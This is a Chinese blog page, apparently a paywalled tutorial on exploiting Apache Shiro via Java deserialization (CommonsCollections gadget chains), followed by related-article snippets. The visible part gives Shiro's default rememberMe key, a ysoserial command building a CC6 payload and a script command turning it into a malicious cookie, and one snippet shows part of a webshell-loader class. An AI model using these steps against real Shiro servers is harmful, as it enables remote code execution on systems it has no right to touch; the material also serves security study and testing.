Java反序列化(十一)CommonCollectionsK1分析及在Shiro中的利用

最新推荐文章于 2024-03-01 19:20:59 发布
最新推荐文章于 2024-03-01 19:20:59 发布
阅读量1k 收藏
点赞数
分类专栏: Java 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41918771/article/details/120933456
版权
本文详细分析了如何利用CommonCollectionsK1进行Java反序列化攻击,特别是在Shiro框架中的应用。通过研究错误信息,揭示了Shiro反序列化过程中的类加载机制,指出其与标准加载方式的区别,特别是对于数组类型的处理。在构造payload的过程中,解释了为何需要避免使用数组以及如何处理HashMap以防止早期触发异常,确保payload的成功构造和执行。
摘要由CSDN通过智能技术生成

前言

在Shiro中的利用可真是复杂

利用CC6攻击Shiro

使用CC6链生成payload,进行利用。shiro 1.2.4以下默认使用密钥为kPH+bIxk5D2deZiIxcaaaA==

通过yso获取序列化对象。

java -jar ysoserial.jar CommonsCollections6 "calc.exe" > result.ser

然后通过Serfile_to_rememberme.py生成payload。

python3 Serfile_to_rememberme.py kPH+bIxk5D2deZiIxcaaaA== result.ser > 1.txt

工具地址:https://github.com/Vicl1fe/Tools/blob/main/%E5%B0%8F%E5%B7%A5%E5%85%B7/Shiro%E5%BA%8F%E5%88%97%E5%8C%96%E6%96%87%E4%BB%B6%E8%BD%ACrememberMe/Serfile_to_rememberme.py

了解本专栏 订阅专栏 解锁全文 超级会员免费看
Vicl1fe
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
Java反序列化(十二)CommonCollectionsK2分析
Vicl1fe的博客
10-25 383
CommonCollectionsK2 在 Shiro_k1文章讲解了CommonCollectionsK1利用代码。需要CC版本小于3.2.1。 而CommonCollectionsK2就是在CC4.0利用。其实利用代码和K1的是一样的。只是有一个地方不一样。 在K1,LazyMap是这样获取的 Map lazyMap = LazyMap.decorate(outmap,faketransformer); 而在CC4,没有了decorate方法。用lazyMap方法代替即可 所以K2这样
Shiro_Xray:CommonsBeanutils1,CommonsCollectionsK1
04-14
Shiro_Xray 小工具 CommonsBeanutils1 CommonsCollectionsK1 CommonsCollectionsK2 Getshell冰蝎 import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; import java.io.PrintWriter; import java.net.URLDecoder; import sun.misc.BASE64Decoder; public class 10837093162496 extends AbstractTranslet { static { Object var1 = null; String var2 = Thread.currentThread().getContextClassLoa
使用 Fuzztag 一键爆破反序列化
阿道夫的博客
03-06 282
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
Javaweb安全——反序列化漏洞-CC&CB链思路整理
weixin_43610673的博客
10-28 2360
如上图所示基本上起点终点就是那几个点然后相互拼接:《Shiro RememberMe 漏洞检测的探索之路》Koalr师傅已经对CommonsCollections 系列 gadget进行了提纯变成以下四条对命令执行部分的调用分别为InvokerTransformer调用TemplatesImpl对 commons-Collections4 的适配则直接用替换。
[Java反序列化]CommonsCollections1利用链学习(下)
feng的博客
08-14 447
前言 白天学习了CommonsCollections1的TransformedMap链,感觉打开了新世界的大门,所以晚上学习了LazyMap链,感觉也没那么难理解,可能是因为我在看CC链之前已经把基础知识都给过了一遍叭,所以才没那么困难。 环境 <dependencies> <dependency> <groupId>commons-collections</groupId> <artifactId>com
fastjson反序列化漏洞
最新发布
qq_63980959的博客
03-01 1371
​ Fastjson是一款开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化JavaBean。​ fastjson反序列化与weblogic、shiro反序列化类似,在客户端将json数据进行序列化传送至服务端后,服务端会将其反序列化读取其数据,若客户端操控json数据,加入一些恶意类方法、代码,则可能会造成服务端代码执行。同时由于fastjson采用黑名单过滤的方式,也存在着被绕过的风险。
Java代码审计:反序列化CommonsCollections1详解
god_Zeo的安全博客
08-27 1517
0x01 漏洞介绍 Apache Commons Collections是一个第三方的基础类库,提供了很多强有力的数据结构类型并且实现了各种集合工具类,可以说是apache开源项目的重要组件。 CommonsCollection在java反序列化的源流已经存在5年 今天介绍的CommonsCollections1,反序列化的第一种RCE序列化链 CommonsCollections1反序列化漏洞点仍然是commons-collections-3.1版本 0x02 实验环境 maven的pom导入依赖
shiro反序列化工具,加强版
12-27
在"shiro反序列化工具,加强版"这个主题,我们主要关注的是Shiro框架可能存在的反序列化漏洞以及如何利用和防范这些漏洞。 反序列化漏洞是由于程序在接收到网络传输的数据后,将其从二进制流恢复为对象时没有...
ShiroExp-1.3.1-all.jar shiro反序列化检测工具
01-12
ShiroExp-1.3.1-all.jar shiro反序列化检测工具 我这里是用于搭建攻防演练演示环境用
shiro反序列化脚本.zip
07-28
标题 "shiro反序列化脚本.zip" 指向的是一个与Apache Shiro安全框架相关的反序列化漏洞利用工具。Apache Shiro是一款广泛使用的Java安全框架,它提供了身份验证、授权、会话管理和加密等功能。然而,在某些版本,...
Commons BeanUtils包说明
03-16
NULL 博文链接:https://sosuny.iteye.com/blog/447564
commons-collections所有版本(1.0-3.2.1).zip
10-14
commons-collections所有版本(1.0-3.2.1).zip
反序列化利用工具ShiroExploit.V2.51.7z
08-31
Java、.NET等编程语言反序列化广泛用于网络通信、持久化存储等领域。然而,如果反序列化的输入未经验证,恶意用户可以构造特定的序列化数据,从而触发非预期的行为,甚至执行任意代码。 ShiroExploit.V2.51是...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
当这些操作不受限制时,恶意用户可以利用此漏洞,发送特制的序列化数据包,使得 Shiro反序列化过程执行恶意代码。J1anfen 创建的 "shiro_attack_by J1anfen" 工具就是为了检测和验证这种漏洞的存在。 该工具...
Java反序列化漏洞:Commons Collections 1 学习笔记
niu_niu_的博客
11-29 614
Java反序列化漏洞,cc1
Java反序列化漏洞——CommonsCollections1链分析
Thunderclap的博客
02-17 1180
我们知道,如果一个类的方法被重写,那么在调用这个函数时,会优先调用经过修改的方法。因此,如果某个可序列化的类重写了readObject()方法,并且在readObject()对Map类型的变量进行了键值修改操作,且这个Map变量是可控的,我么就可以实现攻击目标。LazyMap的漏洞触发点和TransformedMap唯一的差别是,TransformedMap是在写入元素的时候执行transform,而LazyMap是在其get方法执行的factory.transform。
Common-Collections 1
Christ1na的博客
09-09 742
与TransformedMap相同,这条链同样在jdk8u71以后不能使用,原因也相同,变更后的AnnotationInvocationHandler#readObject不再直接使用反序列化得到的Map对象,所以不能够使用了
CommonsCollections 1分析
qq_31065143的博客
04-01 530
CommonsCollections 1分析 利用链 ObjectInputStream.readObject() AnnotationInvocationHandler.readObject() Map(Proxy).entrySet() AnnotationInvocationHandler.invoke() LazyMap.get() Chai
ShiroJava原生反序列化漏洞
热门推荐
公众号shadow sock7
07-28 1万+
参考: http://www.lmxspace.com/2019/10/17/Shiro-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E8%AE%B0%E5%BD%95/ https://github.com/jas502n/Shiro_Xray 环境搭建 git clone https://github.com/apache/shiro.git # wget https://codeload.github.com/apache/shiro/zip/shiro-root-1
shiro反序列化利用工具
07-27
Shiro是一个被广泛应用于Java应用程序的安全框架,它提供了身份验证、授权、会话管理等功能。由于Shiro在处理用户会话序列化时存在一些安全漏洞,攻击者可以利用这些漏洞进行反序列化攻击。 反序列化攻击是一种利用Java对象序列化机制的攻击方法。攻击者可以通过构造恶意的序列化数据,将其传递给目标应用程序,然后利用漏洞触发目标应用程序对恶意数据的反序列化操作。这样一来,攻击者就能够在目标系统上执行任意代码,从而导致严重的安全问题。 为了利用Shiro反序列化漏洞,攻击者需要先找到目标系统使用了Shiro的应用程序。然后,攻击者可以使用开源的反序列化利用工具,如ysoserial或ShiroExploit,生成恶意的序列化数据。这些工具可以方便地构造包含恶意代码的序列化对象,并将其序列化为字节流。 一旦攻击者生成了恶意的序列化数据,他们就可以通过各种方式将其传递给目标应用程序,例如通过网络传输、文件上传等方式。当目标应用程序接收到这些恶意数据并进行反序列化操作时,恶意代码就会在目标系统上执行。 为了防止Shiro反序列化利用工具的攻击,开发人员可以采取以下措施: 1. 及时更新Shiro版本:Shiro开发团队会定期修复漏洞并发布新版本。开发人员应及时更新Shiro框架,以修复已知的反序列化漏洞。 2. 停用或限制不必要的Shiro功能:如果应用程序不需要某些Shiro功能,开发人员可以将其禁用或限制,以降低攻击面。 3. 输入验证与过滤:开发人员应该对用户输入进行严格的验证和过滤,以防止恶意的序列化数据被传递到应用程序。 4. 序列化对象白名单:在反序列化时,开发人员可以使用白名单机制,限制只允许特定的序列化对象进行反序列化操作。 总之,Shiro反序列化利用工具是一种攻击手段,开发人员应该重视相关安全漏洞,并采取适当的措施来保护应用程序免受此类攻击的影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Vicl1fe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值